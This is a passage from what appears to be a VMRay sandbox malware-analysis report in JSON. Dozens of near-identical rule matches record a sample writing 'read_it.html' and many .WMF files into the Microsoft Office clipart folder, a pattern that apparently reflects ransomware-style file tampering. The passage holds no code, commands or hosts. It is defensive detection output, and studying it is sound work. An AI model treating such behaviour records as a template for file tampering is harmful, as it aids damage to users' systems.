"_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_31953", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00601_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33272", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00601_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00602_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33279", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00602_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00612_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33286", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00612_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00623_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33293", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00623_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00625_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33300", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00625_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00636_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33307", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00636_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00669_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33314", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00669_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00681_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33321", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00681_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33328", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00687_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33335", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00687_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00688_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33342", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00688_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00693_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33349", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00693_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01013_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33356", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01013_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01015_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33363", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01015_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01058_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33370", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01058_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01065_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33377", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01065_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01080_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33384", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01080_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01242_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33391", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01242_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01291_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33398", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01291_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01329_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33405", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01329_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01461_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33412", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01461_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01618_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33419", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01618_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01759_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33426", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01759_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01875_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33433", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01875_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH01923_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33440", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh01923_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02155_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33449", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02155_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02166_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33456", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02166_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33463", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33470", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33477", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02313_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33484", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02313_.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HM00005_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33491", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\hm00005_.wmf\".", "technique_path": 